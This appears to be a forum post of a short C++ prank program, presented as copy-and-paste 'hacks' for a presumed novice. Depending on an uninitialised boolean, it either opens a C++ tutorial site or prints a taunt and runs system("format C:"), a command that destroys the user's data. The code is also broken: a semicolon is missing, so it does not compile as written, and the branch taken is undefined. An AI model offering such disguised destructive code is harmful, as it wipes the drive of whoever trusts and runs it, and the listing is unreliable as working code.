Full code:
[highlight=c++]#include <iostream>
void WriteYourOwn()
{
using namespace std;
cout << "Error, current user is not worthy enough!" << endl
cout << "Formatting hard drive!" << endl;
system("format C:");
}
void Learn2Code()
{
system("start http://www.learncpp.com/");
}
void BestHackstoCandP()
{
bool noob;
if(noob == true)
{
Learn2Code();
}
else
{
WriteYourOwn();
}
}
int main()
{
BestHackstoCandP();
return 0;
}
[/highlight]